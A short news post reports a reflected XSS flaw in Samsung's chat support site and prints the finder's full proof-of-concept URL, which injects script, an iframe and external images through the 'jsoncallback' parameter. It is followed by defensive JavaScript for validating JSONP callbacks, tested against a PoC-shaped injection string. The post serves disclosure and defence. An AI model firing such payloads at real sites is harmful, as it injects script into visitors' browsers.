XSS (Cross Site Scripting) Vulnerability Found in Samsung.com
A hacker named "Sony" found an XSS vulnerability in the Samsung website. According to his report, http://chat.support.samsung.com is vulnerable to an XSS attack.
Screenshot of Vulnerability:
POC:
http://chat.support.samsung.com/LiveChat/chkCIC?site_cd=AE&jsoncallback=%22%3E%3Cbody%20background=%22http://www.lenagold.ru/fon/ori/sneg/snow29.gif%22%3E%3Cscript%3Ealert%28%22Cheers%20to%20a%20new%20year%20and%20another%20chance%20for%20us%20to%20get%20it%20right.%20By%20Sony%22%29%3C/script%3E%3Ciframe%20width=%22540%22%20height=%22450%22%20src=%22http://www.youtube.com/embed/45wmyMgyZuY%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E%3Cimg%20src=http://media.bigoo.ws/content/christmas/gif_santa_claus/santa_claus_78.gif%20align=center%3E%3Cimg%20src=http://i1.giftube.ru/multjashki/kot_vygljadyvaet_927ccf5f2ff24217ac6dd26dceed075a.gif%20align=center%3E
The original post can be found here. A few months back, he found an XSS vulnerability in the Adobe Profile page.
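The PoC above injects markup through the `jsoncallback` query parameter. The following added example (not code from Samsung or from the original report) shows one way a server can handle such a parameter safely, assuming the endpoint echoes the callback name into its response; the function names and sample queries are hypothetical.

```javascript
// Added example: strict handling of a JSONP callback parameter.
// Assumption: the endpoint echoes `jsoncallback` into its response body.

// Only dotted JavaScript identifiers are accepted as a callback name.
const CALLBACK_RE = /^[A-Za-z_$][A-Za-z0-9_$]*(?:\.[A-Za-z_$][A-Za-z0-9_$]*)*$/;
const MAX_CALLBACK_LEN = 64;

// Serialize data so it cannot close a <script> block or inject markup
// even if the response is embedded in, or sniffed as, HTML.
function jsonForScript(data) {
  return JSON.stringify(data)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Build the response for a raw query string; returns {status, headers, body}.
function buildJsonpResponse(query, data) {
  const callback = new URLSearchParams(query).get('jsoncallback');
  const headers = { 'X-Content-Type-Options': 'nosniff' };

  if (callback === null) {
    // No callback requested: plain JSON, never HTML.
    headers['Content-Type'] = 'application/json; charset=utf-8';
    return { status: 200, headers, body: jsonForScript(data) };
  }
  if (callback.length > MAX_CALLBACK_LEN || !CALLBACK_RE.test(callback)) {
    // Reject instead of sanitizing, and never echo the rejected value back.
    headers['Content-Type'] = 'text/plain; charset=utf-8';
    return { status: 400, headers, body: 'invalid callback' };
  }
  headers['Content-Type'] = 'application/javascript; charset=utf-8';
  return { status: 200, headers, body: `${callback}(${jsonForScript(data)});` };
}

// Constructed inputs: a legitimate callback, and a shortened value with the
// same shape as the PoC's jsoncallback parameter.
const GOOD_QUERY = 'site_cd=AE&jsoncallback=jQuery17_123';
const POC_SHAPED_QUERY =
  'site_cd=AE&jsoncallback=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E';

console.log(buildJsonpResponse(GOOD_QUERY, { status: 'ok' }));
console.log(buildJsonpResponse(POC_SHAPED_QUERY, { status: 'ok' }));
```

Rejecting the request outright, rather than stripping characters from the callback, avoids filter-bypass edge cases, and the explicit `Content-Type` with `nosniff` keeps browsers from rendering the response as HTML.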